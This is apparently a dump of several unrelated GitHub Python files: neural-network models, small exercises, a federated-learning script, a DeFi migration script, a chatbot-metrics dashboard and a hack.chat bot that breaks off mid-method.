tf.nn.conv2d(self.layer4_bn, self.w5, [1, 1, 1, 1], padding='SAME')\n            self.layer5_relu = tf.nn.relu(self.layer5_conv + self.b5)\n            self.layer5_mean, self.layer5_var = tf.nn.moments(self.layer5_relu, [0,1,2])\n            self.layer5_bn = tf.nn.batch_normalization(x=self.layer5_relu, mean=self.layer5_mean, variance=self.layer5_var, offset=None, scale=None, variance_epsilon=EPSILON)\n            self.layer5_pool = tf.nn.max_pool(self.layer5_bn, [1, 3, 3, 1], [1, 2, 2, 1], padding='SAME')\n            \n            # FULLY CONNECTED LAYERS (FF)\n            # Layer 6\n            self.flat_layer = tf.contrib.layers.flatten(self.layer5_pool)\n            self.layer6_fccd = tf.matmul(self.flat_layer, self.w6) + self.b6\n            self.layer6_relu = tf.nn.relu(self.layer6_fccd)\n            self.layer6_mean, self.layer6_var = tf.nn.moments(self.layer6_relu, [0])\n            self.layer6_bn = tf.nn.batch_normalization(x=self.layer6_relu, mean=self.layer6_mean, variance=self.layer6_var, offset=None, scale=None, variance_epsilon=EPSILON)\n            self.layer6_drop = tf.layers.dropout(inputs=self.layer6_bn, rate=0.5, training=self.phase)\n\n            # Layer 7 (uses its own bias b7, not layer 6's b6)\n            self.layer7_fccd = tf.matmul(self.layer6_drop, self.w7) + self.b7\n            self.layer7_relu = tf.nn.relu(self.layer7_fccd)\n            self.layer7_mean, self.layer7_var = tf.nn.moments(self.layer7_relu, [0])\n            self.layer7_bn = tf.nn.batch_normalization(x=self.layer7_relu, mean=self.layer7_mean, variance=self.layer7_var, offset=None, scale=None, 
variance_epsilon=EPSILON)\n \n # Layer 8\n self.logits = tf.matmul(self.layer7_bn, self.w8) + self.b8\n\n # Prob\n self.prediction_op = tf.nn.softmax(self.logits)\n self.argmax = tf.argmax(self.prediction_op, 1)\n\n # Loss\n self.loss_op = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=self.logits, labels=self.tf_labels))\n\n # self.optimizer_op = tf.train.AdamOptimizer(learning_rate=self.learning_rate).minimize(self.loss_op)\n self.optimizer_op = tf.train.GradientDescentOptimizer(self.learning_rate).minimize(self.loss_op)\n\n def get_flattened_op(self):\n return self.flat_layer\n\n def get_inference_op(self):\n return self.logits\n\n def get_prediction_op(self):\n return self.prediction_op\n\n def get_loss_op(self):\n return self.loss_op\n\n\n def get_optimizer_op(self):\n return self.optimizer_op\n\n\n def get_variables(self):\n return {'w1': self.w1, 'w2': self.w2, 'w3': self.w3, 'w4': self.w4, \\\n 'w5': self.w5, 'w6': self.w6, 'w7': self.w7, 'w8': self.w8, \\\n 'b1': self.b1, 'b2': self.b2, 'b3': self.b3, 'b4': self.b4, \\\n 'b5': self.b5, 'b6': self.b6, 'b7': self.b7, 'b8': self.b8 }\n\n\n def get_saver(self):\n return tf.train.Saver({'w1': self.w1, 'w2': self.w2, 'w3': self.w3, 'w4': self.w4, \\\n 'w5': self.w5, 'w6': self.w6, 'w7': self.w7, 'w8': self.w8, \\\n 'b1': self.b1, 'b2': self.b2, 'b3': self.b3, 'b4': self.b4, \\\n 'b5': self.b5, 'b6': self.b6, 'b7': self.b7, 'b8': self.b8 })\n\n","repo_name":"davidlwr/Image_Classification","sub_path":"Alexnet/alexnet_bn_after_relu.py","file_name":"alexnet_bn_after_relu.py","file_ext":"py","file_size_in_byte":9542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
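One caveat in the graph above: tf.nn.moments recomputes batch statistics on every pass, so inference normalizes with test-batch statistics rather than training-time averages. A minimal TF1-style sketch of the usual fix, an exponential moving average; the decay, shape, and variable names are illustrative, not from the original code:

import tensorflow as tf

decay = 0.99  # illustrative EMA decay
moving_mean = tf.get_variable("moving_mean", shape=[96], trainable=False,
                              initializer=tf.initializers.zeros())
moving_var = tf.get_variable("moving_var", shape=[96], trainable=False,
                             initializer=tf.ones_initializer())

def batch_norm(x, training, eps=1e-3):
    """Normalize with batch moments while training, EMA moments at inference."""
    if training:
        mean, var = tf.nn.moments(x, [0, 1, 2])
        updates = [tf.assign(moving_mean, decay * moving_mean + (1 - decay) * mean),
                   tf.assign(moving_var, decay * moving_var + (1 - decay) * var)]
        with tf.control_dependencies(updates):  # update EMAs before returning
            return tf.nn.batch_normalization(x, mean, var, None, None, eps)
    return tf.nn.batch_normalization(x, moving_mean, moving_var, None, None, eps)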
+{"seq_id":"73678259750","text":"\"\"\"\nProblem:\n\n \nProfessor Odd has developed a very odd system of rounding numbers.\n \n \nLike normal rounding, when rounding to the nearest 10 or 100, he looks at\n \nthe next digit. However, in odd_rounding, if it is zero or odd, he'll round\n \ndown. If it is bigger than zero and even he'll round up.\n\n \nExample:\n\n \n573 rounded to the nearest 10 is 570, because 3 is odd.\n \n429 rounded to the nearest 100 is 500, because 2 is even.\n \n390 rounded to the nearest 10 is 390, because it ends in 0.\n\n \nThe function odd_rounding takes two numbers: the number to be rounded,\n \nand what we want to round to. \n \nWe will only round to 10 or 100 for the purposes of this problem, but try\n \nand find a general solution for any power of 10.\n\nTests:\n\n \n>>> odd_rounding(573, 10)\n570\n \n>>> odd_rounding(572, 10)\n570\n \n>>> odd_rounding(573, 100)\n500\n \n>>> odd_rounding(429, 100)\n500\n \n>>> odd_rounding(790, 10)\n790\n\"\"\"\nimport doctest, math\ndef run_tests():\n doctest.testmod(verbose=True)\n\ndef odd_rounding(num, tens):\n # Number to check\n num_to_check = int(str(num // tens)[-1])\n result = None\n if num_to_check == 0 or num_to_check % 2 == 1:\n # Replace trailing digits with 0\n result = (num // (tens)) * (tens)\n else:\n # Increment number and then add trailing 0s\n result = (num // (tens) + 1) * (tens)\n\n print(result)\n\nif __name__ == \"__main__\":\n run_tests()\n","repo_name":"LukeBriggsDev/GCSE-Code-Tasks","sub_path":"p02.1x/odd_rounding.py","file_name":"odd_rounding.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"19488941702","text":"'''\n → Combinations\n → Order does not matter\n → Does not repeat single values\n'''\n\n# import\nfrom itertools import combinations\n\n# declare\npeople = ['Raul', 'André', 'John', 'Lucas']\n\nfor group in combinations(people, 2):\n print(group)","repo_name":"rauldosS/utilities_python","sub_path":"02_python/04_functions/itertools/02_combinations.py","file_name":"02_combinations.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"71665918629","text":"import numpy as np\nfrom fedbiomed.common.training_plans import FedSGDRegressor\nfrom fedbiomed.common.data import DataManager\nfrom fedbiomed.researcher.experiment import Experiment\nfrom fedbiomed.researcher.aggregators.fedavg import FedAverage\n\nmodel_args = {\n 'eta0':5e-3,\n 'n_features': 4,\n 'penalty': None,\n 'random_state': 12342,\n 'feature_cols': ['PM25', 'dummy_male', 'age', 'cbmi'],\n 'target_cols': ['blood_pre'],\n 'X_fed_mean': [ 1.1655, 0.52336, 4.2187, 16.213],\n 'X_fed_std': [0.037987, 0.49945 , 0.15293, 1.6210],\n}\n\ntraining_args = {\n 'num_updates': 500,\n 'batch_size': 5,\n 'log_interval': 100\n}\n\ntags = ['eucaim_demo_ml_2']\nnum_rounds = 20\n\nclass SGDRegressorTrainingPlan(FedSGDRegressor):\n def training_data(self, batch_size):\n dataset = pd.read_csv(self.dataset_path)\n\n # create dummy male variable\n dataset['dummy_male'] = (dataset['sex'] == 'male').astype(int)\n\n # select feature columns\n dataset = dataset[self.model_args()['feature_cols'] + self.model_args()['target_cols']]\n\n # drop NaN values\n dataset = dataset.dropna(axis=0)\n \n # convert to numpy array\n X = dataset[self.model_args()['feature_cols']].values\n y = dataset[self.model_args()['target_cols']].values\n\n # normalize feature values\n X = (X - np.array(self.model_args()['X_fed_mean']))/np.array(self.model_args()['X_fed_std'])\n \n return DataManager(dataset=X, \n target=y, \n batch_size=batch_size, \n shuffle=True)\n\n\n# Define the training experiment\nexp = Experiment(tags=tags,\n model_args=model_args,\n training_plan_class=SGDRegressorTrainingPlan,\n training_args=training_args,\n round_limit=num_rounds,\n aggregator=FedAverage(),\n node_selection_strategy=None,\n skip_data_quality_check=True)\n\n# Run the training\nexp.run()\n\n# Extract regression parameters\nparams = exp.aggregated_params()[num_rounds-1]['params']\n\n# Scale back to unnormalized values\nintercept = params['intercept_'] - np.dot(np.array(model_args['X_fed_mean']), params['coef_']/np.array(model_args['X_fed_std']))\ncoef = np.array(params['coef_'])/np.array(model_args['X_fed_std'])\n\nprint(f'Intercept: {intercept}')\nfor feature_col_name, coef in zip(model_args['feature_cols'], coef):\n print(f'{feature_col_name}: {coef}')\n","repo_name":"sharkovsky/EUCAIM_Fedbiomed_demo","sub_path":"demo_ml/federated_training.py","file_name":"federated_training.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"40627190170","text":"import numpy as np\nimport sobamchan_chainer\nimport chainer.links as L\nimport chainer.functions as F\nfrom chainer import Variable\nimport chainer\n\nclass GLU_conv(sobamchan_chainer.Model):\n\n def __init__(self, in_channels, out_channels, ksize):\n super(GLU_conv, self).__init__(\n conv=L.Convolution2D(in_channels, out_channels, (1, ksize)),\n )\n self.padding = int(ksize/2)\n\n @staticmethod\n def zero_padding(x, padding_size, axis=3):\n size = list(x.shape)\n size[axis] = padding_size\n zeros = Variable(np.zeros(size, dtype=np.float32))\n x = F.concat([zeros, x], axis)\n return x\n\n def __call__(self, x):\n x = self.zero_padding(x, self.padding)\n return self.conv(x)\n\n\nclass Gated_Unit(sobamchan_chainer.Model):\n\n def __init__(self, in_channels, out_channels, ksize):\n super(Gated_Unit, self).__init__(\n conv=GLU_conv(in_channels, out_channels, ksize),\n conv_g=GLU_conv(in_channels, out_channels, ksize)\n )\n\n def __call__(self, x):\n A = self.conv(x)\n B = F.sigmoid(self.conv_g(x))\n h = A * B\n batch, channel, height, width = h.shape\n return h\n\nclass ResBlock(sobamchan_chainer.Model):\n\n def __init__(self, block_n, in_channels, out_channels, ksize):\n super(ResBlock, self).__init__()\n modules = []\n for i in range(block_n):\n modules += [('gated_unit_{}'.format(i), Gated_Unit(in_channels, out_channels, ksize))]\n in_channels = out_channels\n [self.add_link(*link) for link in modules]\n self.modules = modules\n self.block_n = block_n\n \n def __call__(self, x, train=False):\n h = x\n for i in range(self.block_n):\n h = self['gated_unit_{}'.format(i)](h)\n channel_diff = h.shape[1] - x.shape[1]\n x = GLU_conv.zero_padding(x, channel_diff, 1)\n length_diff = x.shape[3] - h.shape[3]\n h = GLU_conv.zero_padding(h, length_diff, 3)\n return x + h\n\n\nclass Gated_Conv_Net(sobamchan_chainer.Model):\n\n def __init__(self, resblock_n, in_channels, out_channels, ksize, category_n):\n super(Gated_Conv_Net, self).__init__()\n modules = []\n for i in range(resblock_n):\n modules += [('resblock_{}'.format(i), ResBlock(3, in_channels, out_channels, ksize))]\n in_channels = out_channels\n modules += [('fc', L.Linear(None, category_n))]\n [ self.add_link(*link) for link in modules ]\n self.modules = modules\n self.resblock_n = resblock_n\n self.category_n = category_n\n\n def __call__(self, x, train=True):\n for i in range(self.resblock_n):\n x = self['resblock_{}'.format(i)](x, train)\n x = self['fc'](x)\n return x\n # batch = x.shape[0]\n # return F.reshape(x, (batch, self.category_n, -1))\n\n def cal_loss(self, y, t):\n return F.softmax_cross_entropy(y, t)\n\n def cal_acc(self, y, t):\n return F.accuracy(y, t)\n","repo_name":"sobamchan/language_modeling_with_gated_convolutional_networks","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"11643623771","text":"import sys\n\nN = int(sys.stdin.readline())\n\nwords = []\n\nfor _ in range(N):\n\twords.append(sys.stdin.readline().strip())\n\n# 단어의 길이순으로 words 정렬\nwords.sort(key=len)\n\nresult = 0\n\nfor n in range(N):\n prefixFlag=False\n for i in range(n+1,N):\n if words[i].find(words[n])==0 : #접두사\n prefixFlag=True\n break\n if not prefixFlag :\n result += 1\n\nprint(result)","repo_name":"YuSuhwa-ve/BOJ","sub_path":"1141.py","file_name":"1141.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"5033231404","text":"from brownie import accounts, interface, Contract, nwToken, nProxy, MigrateCTokens\nfrom brownie.network import Chain\nchain = Chain()\n\nclass cTokenMigrationEnvironment:\n def __init__(self, deployer) -> None:\n self.deployer = deployer\n self.whales = {}\n self.whales[\"ETH\"] = accounts.at(\"0x1b3cb81e51011b549d78bf720b0d924ac763a7c2\", force=True)\n self.whales[\"DAI\"] = accounts.at(\"0x604981db0C06Ea1b37495265EDa4619c8Eb95A3D\", force=True)\n self.whales[\"USDC\"] = accounts.at(\"0x0a59649758aa4d66e25f08dd01271e891fe52199\", force=True)\n self.whales[\"WBTC\"] = accounts.at(\"0x6dab3bcbfb336b29d06b9c793aef7eaa57888922\", force=True)\n self.notional = interface.NotionalProxy(\"0x1344A36A1B56144C3Bc62E7757377D288fDE0369\")\n\n def deployNCTokens(self):\n # self.ncETH = self.deployNCToken(\n # \"0x4Ddc2D193948926D02f9B1fE9e1daa0718270ED5\",\n # True\n # )\n \n # self.deployNCToken(\n # \"0x5d3a536E4D6DbD6114cc1Ead35777bAB948E3643\",\n # False\n # )\n\n # self.ncUSDC = self.ncUSDC = self.deployNCToken(\n # \"0x39AA39c021dfbaE8faC545936693aC917d5E7563\",\n # False\n # )\n # self.ncWBTC = self.deployNCToken(\n # \"0xccF4429DB6322D5C611ee964527D42E5d685DD6a\",\n # False\n # )\n self.ncTokens = {}\n self.ncTokens[1] = Contract.from_abi('nwETH', \"0xaaC5145f5286a3C6a06256fdfBf5b499aA965C9C\", nwToken.abi)\n self.ncTokens[2] = Contract.from_abi('nwDAI', \"0xDBBB034A50C436359fb6D87D3D669647E0FA24D5\", nwToken.abi)\n self.ncTokens[3] = Contract.from_abi('nwUSDC', \"0xc91864Be1b097c9c85565cDB013Ba2307FFB492a\", nwToken.abi)\n self.ncTokens[4] = Contract.from_abi('nwWBTC', \"0x0F12B85A331aCb515e1626F707aadE62E9960187\", nwToken.abi)\n\n def migrateAll(self, migrateFromPaused=True):\n chain.snapshot()\n # patch = MigrateCTokens.deploy(\n # \"0xC2c594f0bb455637a93345A17f841DAC750ccF54\", # Current Implementation\n # \"0x5030D70175e27e46216Ee48972bC8E2db12bBA6D\", # Paused Router\n # self.notional,\n # self.ncTokens[1],\n # self.ncTokens[2],\n # self.ncTokens[3],\n # self.ncTokens[4],\n # {\"from\": self.deployer}\n # )\n patch = MigrateCTokens.at(\"0x02551ded3F5B25f60Ea67f258D907eD051E042b2\")\n self.notional.transferOwnership(patch, False, {\"from\": self.notional.owner()})\n patch.atomicPatchAndUpgrade({\"from\": self.notional.owner()})\n\n if migrateFromPaused:\n self.notional.upgradeTo(\"0x0158fC072Ff5DDE8F7b9E2D00e8782093db888Db\", {\"from\": self.notional.owner()})\n\n def deployNCToken(self, cToken, isETH):\n impl = nwToken.deploy(self.notional.address, cToken, isETH, {\"from\": self.deployer})\n proxy = nProxy.deploy(impl, bytes(), {\"from\": self.deployer})\n return Contract.from_abi(\"nwToken\", proxy.address, nwToken.abi)\n\n\ndef main():\n deployer = accounts.at(\"0xE6FB62c2218fd9e3c948f0549A2959B509a293C8\", force=True)\n env = cTokenMigrationEnvironment(deployer)\n env.deployNCTokens()\n env.migrate(1)\n env.migrate(2)\n env.migrate(3)\n env.migrate(4)\n","repo_name":"notional-finance/contracts-v2","sub_path":"scripts/CTokenMigrationEnvironment.py","file_name":"CTokenMigrationEnvironment.py","file_ext":"py","file_size_in_byte":3222,"program_lang":"python","lang":"en","doc_type":"code","stars":81,"dataset":"github-code","pt":"71"}
+{"seq_id":"28227624407","text":"import altair as alt\nimport ast \nimport datetime\nimport pandas as pd\nimport pytz\nimport psycopg2\nimport json\nimport mysql.connector\nalt.renderers.enable('json')\nclass Database():\n def __init__(self):\n db = ConfigParser()\n db.read(\"/app/actions/config_data.ini\")\n db_creds = db['database']\n self.host = db_creds['host']\n self.database = db_creds['database']\n self.user = db_creds['user']\n self.password = db_creds['password']\n \n def engine(self):\n connection = None\n try:\n connection = psycopg2.connect(host=self.host,\n database=self.database,\n user=self.user,\n password=self.password)\n \n except Error as error:\n print(\"Failed to connect: {}\".format(error))\n \n finally:\n return connection \n\n def query(self, mySql_select_query):\n engine = self.engine()\n cursor = engine.cursor()\n cursor.execute(mySql_select_query)\n results = cursor.fetchall()\n return results \n\nclass Metrics():\n def __init__(self):\n self.eng = Database()\n\n def returned_users_data(self):\n SQL = \"SELECT timestamp,(COUNT(sender_id)-1) FROM public.events WHERE type_name = 'session_started' GROUP BY timestamp;\"\n results = self.eng.query(SQL)\n dates=[[result[1],datetime.datetime.fromtimestamp(result[0],tz=pytz.timezone('Asia/Kolkata')).strftime('%Y-%m-%dT%H:%M:%S')] for result in results]\n df = pd.DataFrame(dates, columns = ['Count','dates'])\n return df\n def returned_users_chart(self):\n df = self.returned_users_data()\n brush = alt.selection(type='interval', encodings=['x'])\n bars = alt.Chart().mark_bar().encode(\n x='monthdate(dates):O',\n y=alt.Y('Count:Q',scale=alt.Scale(domain=[0,2])),\n opacity=alt.condition(brush, alt.OpacityValue(1), alt.OpacityValue(0.7)),\n ).add_selection(\n brush\n )\n\n line = alt.Chart().mark_rule(color='firebrick').encode(\n y='mean(Count):Q',\n size=alt.SizeValue(3)\n ).transform_filter(\n brush\n )\n\n returned_users = alt.layer(bars, line, data=df).properties(height=300, width=500)\n\n return returned_users\n\n def users_and_queries_data(self):\n SQL = \"SELECT sender_id, timestamp FROM public.events WHERE type_name = 'user';\"\n results = self.eng.query(SQL)\n times=[[result[0],datetime.datetime.fromtimestamp(result[1],tz=pytz.timezone('Asia/Kolkata')).strftime('%Y-%m-%dT%H:%M:%S')] for result in results]\n df = pd.DataFrame(times, columns=['sender','Time'])\n df['Queries'] = 1\n return df\n\n def users_and_queries_chart(self):\n df = self.users_and_queries_data()\n brush = alt.selection(type='interval', encodings=['y'])\n color = alt.condition(brush, alt.Color('count(Queries):Q'),alt.value('gray'))\n heat = alt.Chart(df).mark_rect().encode(\n x= alt.X(\"hours(Time):O\",title='Time'), \n y=alt.Y(\"monthdate(Time):O\",title='Number of queries'),\n color= color,\n tooltip=alt.Tooltip(['sum(Queries):Q',\"hours(Time):O\"])).properties(\n height=350,width=700).add_selection(\n brush)\n line=alt.Chart(df).mark_bar().encode(\n x = alt.X('sender:N'),\n y = alt.Y('count():Q', scale=alt.Scale(domain=[0,10]))).transform_filter(\n brush).properties(\n height=200,width=675)\n\n\n rule = alt.Chart(df).transform_joinaggregate(group_count='count(*)', groupby=['sender'] ).mark_rule(color='red').encode(\n y=alt.Y('mean(group_count):Q')).transform_filter(\n brush)\n red = alt.Chart(df).transform_joinaggregate(\n group_count='count(*)', groupby=['sender'] ).mark_rule(\n color='red').encode(\n y ='mean(group_count):Q').transform_filter(\n brush)\n heatmap = alt.vconcat(heat, line+rule+red)\n\n return heatmap\n\n def 
unique_users_data(self):\n SQL = \"SELECT DISTINCT sender_id, MIN(timestamp) FROM public.events WHERE type_name = 'session_started' GROUP BY sender_id;\"\n results = self.eng.query(SQL)\n times=[[result[0],datetime.datetime.fromtimestamp(result[1],tz=pytz.timezone('UTC')).strftime('%Y-%m-%dT%H:%M:%S')] for result in results]\n unique = pd.DataFrame(times, columns=['sender','time'])\n\n return unique\n def unique_users_chart(self):\n unique = self.unique_users_data()\n unique = alt.Chart(unique).mark_line().encode(\n x='monthdate(time):O',\n y='count():Q').properties(height=300, width=500)\n\n return unique\n def save_charts(self, chart, name):\n chart.save(name)\n \n def pipeline(self):\n metrics = [self.unique_users_chart, self.returned_users_chart, self.users_and_queries_chart]\n names = ['chart_u', 'chart_r', 'chart_q']\n charts = {}\n for metric, name in zip(metrics, names):\n chart = metric()\n charts[name] = chart.to_json()\n \n \n return dict(charts)\n","repo_name":"thundersparkf/django_webserver","sub_path":"dashboard/metrics/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":5403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
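The same epoch-to-IST conversion is repeated in each query handler above; in isolation, with an illustrative timestamp:

import datetime
import pytz

ts = 1614556800  # epoch seconds, as stored in the events table
ist = datetime.datetime.fromtimestamp(ts, tz=pytz.timezone('Asia/Kolkata'))
print(ist.strftime('%Y-%m-%dT%H:%M:%S'))  # 2021-03-01T05:30:00 (UTC midnight + 5:30)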
+{"seq_id":"37596872889","text":"#!/usr/bin/env python3\n\n\"\"\"Connects the bot.\"\"\"\n\nimport os\nimport os.path\nimport random\nimport re\nimport sys\nimport threading\nimport time\n\nimport hclib\nimport pymongo\n\nfrom commands import currency\nfrom commands import dictionary\nfrom commands import jokes\nfrom commands import katex\nfrom commands import password\nfrom commands import paste\nfrom commands import poetry\nfrom commands import search\nimport utility\n\n\nclass HackChatBot:\n \"\"\"Runs the bot.\"\"\"\n _charsPerLine = 88\n _maxLines = 8\n # Messages with more than <_maxChars> characters cause ratelimits.\n _maxChars = _charsPerLine * _maxLines\n _trigger = os.environ.get(\"TRIGGER\")\n _nick = os.environ.get(\"NICK\")\n _url = os.environ.get(\"URL\")\n\n def __init__(self):\n \"\"\"Initializes values.\"\"\"\n # Use instead of as the\n # former makes sure it isn't an empty value.\n if (not os.environ.get(\"CHANNELS\") or not os.environ.get(\"NICK\")\n or not os.environ.get(\"TRIGGER\") or not os.environ.get(\"URL\")):\n sys.exit(\"Please create the \\\"CHANNELS\\\", \\\"NICK\\\", \\\"TRIGGER\\\" \"\n \"and \\\"URL\\\" environment variables.\")\n # The features and their respective functions.\n self._commands = {\n \"afk\": self._away,\n \"alias\": self._alias,\n \"define\": self._define,\n \"h\": self._help,\n \"help\": self._help,\n \"join\": self._join,\n \"joke\": self._joke,\n \"katex\": self._generate_katex,\n \"leave\": self._leave,\n \"msg\": self._message,\n \"password\": self._strengthen,\n \"poem\": self._give_poetry,\n \"poet\": self._give_poetry,\n \"rate\": self._convert,\n \"search\": self._search,\n \"stats\": self._request_statistics,\n \"toss\": self._toss,\n \"translate\": self._translate,\n \"uptime\": self._check_uptime,\n \"urban\": self._urban_define\n }\n self._startTime = time.time()\n uri = os.environ.get(\"MONGODB_URI\")\n client = pymongo.MongoClient(uri)\n uri = uri[::-1]\n slash = re.search(r\"/\", uri)\n dbName = uri[:slash.start()]\n dbName = dbName[::-1]\n self._db = client[dbName]\n env = lambda x, y: os.environ.get(x) if x in os.environ else y\n self._pwd = env(\"PASSWORD\", \"\")\n self._codeUrl = env(\"CODE_URL\", None)\n oxfordAppId = os.environ.get(\"OXFORD_APP_ID\")\n oxfordAppKey = os.environ.get(\"OXFORD_APP_KEY\")\n if oxfordAppId and oxfordAppKey:\n self._oxford = dictionary.Oxford(oxfordAppId, oxfordAppKey)\n else:\n self._commands.pop(\"define\")\n self._commands.pop(\"translate\")\n exchangeRateApiKey = os.environ.get(\"EXCHANGE_RATE_API_KEY\")\n if exchangeRateApiKey:\n self._exchangeRateApiKey = exchangeRateApiKey\n else:\n self._commands.pop(\"rate\")\n print(\"The bot will wait 30 seconds before joining each new channel \"\n + \"to prevent getting ratelimited.\")\n self._channels = os.environ.get(\"CHANNELS\").split(\", \")\n for channel in self._channels:\n self._joinChannel(channel)\n print(\"The bot joined the channel {}\".format(channel))\n time.sleep(30)\n\n def _joinChannel(self, channel):\n \"\"\"Joins the hack.chat channel ().\"\"\"\n args = (self._handle, self._nick, channel, self._pwd, self._url,)\n threading.Thread(target=hclib.HackChat, args=args).start()\n\n def _handle(self, hackChat, info):\n \"\"\"Callback function for data sent from hack.chat.\n\n (callback parameter) is the connection object.\n (callback parameter) is the data sent.\n \"\"\"\n self._hackChat = hackChat\n self._info = info\n if self._info[\"type\"] == \"invite\":\n self._joinChannel(self._info[\"channel\"])\n elif self._info[\"type\"] == 
\"message\":\n # Don't check for AFK statuses if the bot itself sent the\n # message. Otherwise if the bot replied to someone stating\n # chat a user is AFK, the bot will reply to its own message\n # as the AFK user was mentioned in that message.\n if self._nick != self._info[\"nick\"]:\n self._check_afk()\n self._post()\n if \"trip\" in self._info:\n self._log_trip_code()\n txt = self._info[\"text\"].strip()\n space = re.search(r\"\\s\", txt)\n self._msg = txt[space.end():].strip() if space else None\n call = txt[:len(self._trigger)]\n if call == self._trigger:\n check = space.start() if space else len(txt)\n self._cmd = txt[len(self._trigger):check]\n # Get the requested feature (e.g., katex:red is katex).\n pattern = re.search(r\"[^a-zA-Z]\", self._cmd)\n area = pattern.start() if pattern else len(txt)\n self._feature = self._cmd[:area]\n if self._feature in self._commands:\n self._commands[self._feature]()\n elif self._info[\"type\"] == \"online add\":\n self._post()\n elif self._info[\"type\"] == \"online remove\":\n field = \"{}.{}\".format(self._hackChat.channel, self._info[\"nick\"])\n self._db[\"afk\"].update_one(\n {\n self._hackChat.channel: {\n \"$exists\": True\n }\n },\n {\n \"$unset\": {\n field: \"\"\n }\n }\n )\n elif self._info[\"type\"] == \"stats\":\n self._hackChat.send(\n \"There are {} unique IPs in \".format(self._info[\"IPs\"])\n + \"{} channels.\".format(self._info[\"channels\"]))\n elif self._info[\"type\"] == \"warn\":\n print(self._info[\"warning\"])\n\n def _check_afk(self):\n \"\"\"Notifies AFK statuses.\n\n Checks incoming messages for users @-mentioning users who are\n AFK. If it finds any, it will notify them of such.\n \"\"\"\n collection = self._db[\"afk\"]\n query = {\n self._hackChat.channel: {\n \"$exists\": True\n }\n }\n doc = collection.find_one(query)\n if not doc:\n return\n field = \"{}.{}\".format(self._hackChat.channel, self._info[\"nick\"])\n collection.update_one(\n query,\n {\n \"$unset\": {\n field: \"\"\n }\n }\n )\n reply = \"\"\n users = doc[self._hackChat.channel]\n for field in users:\n # Keep a space around the name so as to make sure names\n # nested in longer words aren't taken by accident (e.g.,\n # \"bot\" in \"mybot\").\n person = \" @{} \".format(field)\n # Add a space around the message so as to account for\n # 's extra spaces.\n if person in \" {} \".format(self._info[\"text\"].strip()):\n reply += person.strip()\n reason = users[field]\n if reason:\n reply += \": {}\".format(reason)\n reply += \"\\n\"\n if reply:\n self._hackChat.send(\n \"@{} AFK users:\\n{}\".format(self._info[\"nick\"], reply))\n\n def _log_trip_code(self):\n \"\"\"Stores nicknames with their trip codes.\"\"\"\n self._db[\"trip_codes\"].update_one(\n {\n self._info[\"trip\"]: {\n \"$exists\": True\n }\n },\n {\n \"$addToSet\": {\n self._info[\"trip\"]: self._info[\"nick\"]\n }\n },\n upsert=True\n )\n\n def _post(self):\n \"\"\"Sends messages saved for users.\"\"\"\n collection = self._db[\"messages\"]\n field = \"{}.{}\".format(self._hackChat.channel, self._info[\"nick\"])\n query = {\n field: {\n \"$exists\": True\n }\n }\n doc = collection.find_one(query)\n collection.update_one(\n query,\n {\n \"$unset\": {\n field: \"\"\n }\n }\n )\n if doc:\n reply = \"\"\n for msg in doc[self._hackChat.channel][self._info[\"nick\"]]:\n reply += \"@{}: {}\\n\".format(msg[\"sender\"], msg[\"message\"])\n self._hackChat.send(\n \"@{} you have messages:\\n{}\".format(self._info[\"nick\"], reply))\n\n def _alias(self):\n \"\"\"Sends the requested trip code's 
holdees.\"\"\"\n if self._msg:\n doc = self._db[\"trip_codes\"].find_one({\n self._msg: {\n \"$exists\": True\n }\n })\n if doc:\n nicks = \", \".join(doc[self._msg])\n if len(nicks) > self._maxChars:\n data = paste.dpaste(\"\\n\".join(doc[self._msg]))\n if data[\"type\"] == \"success\":\n nicks = data[\"data\"]\n else:\n self._hackChat.send(\"Sorry, I couldn't get it.\")\n return\n self._hackChat.send(\n \"@{} {} has the \".format(self._info[\"nick\"], self._msg)\n + \"aliases {}\".format(nicks))\n else:\n self._hackChat.send(\n \"@{} no aliases were found\".format(self._info[\"nick\"]))\n else:\n self._hackChat.send(\n \"@{} tells the trip codes' aliases \".format(self._info[\"nick\"])\n + \"(e.g., {}alias dIhdzE)\".format(self._trigger))\n\n def _away(self):\n \"\"\"Handles AFK statuses.\"\"\"\n field = \"{}.{}\".format(self._hackChat.channel, self._info[\"nick\"])\n self._db[\"afk\"].update_one(\n {\n self._hackChat.channel: {\n \"$exists\": True\n }\n },\n {\n \"$set\": {\n field: self._msg\n }\n },\n True\n )\n reply = \"@{} is now AFK\".format(self._info[\"nick\"])\n if self._msg:\n reply += \": {}\".format(self._msg)\n self._hackChat.send(reply)\n\n def _check_uptime(self):\n \"\"\"Tells the bot's uptime.\"\"\"\n diff = time.time() - self._startTime\n oneSecond = 1\n oneMinute = oneSecond * 60\n oneHour = oneMinute * 60\n oneDay = oneHour * 24\n timeTypes = {\n \"days\": {\n \"length\": oneDay,\n \"count\": 0\n },\n \"hours\": {\n \"length\": oneHour,\n \"count\": 0\n },\n \"minutes\": {\n \"length\": oneMinute,\n \"count\": 0\n },\n \"seconds\": {\n \"length\": oneSecond,\n \"count\": 0\n }\n }\n times = []\n for timeType in timeTypes:\n length = timeTypes[timeType][\"length\"]\n count = timeTypes[timeType][\"count\"]\n while diff > length:\n count += 1\n diff -= length\n if count:\n # Check if time is singular (e.g., \"1 days\" to \"1 day\").\n name = timeType[:len(timeType) - 1] if count == 1 else timeType\n times.append(\"{} {}\".format(count, name))\n times = \", \".join(times)\n self._hackChat.send(\"@{} {}\".format(self._info[\"nick\"], times))\n\n def _convert(self):\n \"\"\"Handles currency conversion.\"\"\"\n converted = False\n data = self._cmd.split(\":\") if \":\" in self._cmd else None\n if data and len(data) == 3:\n fromCode = 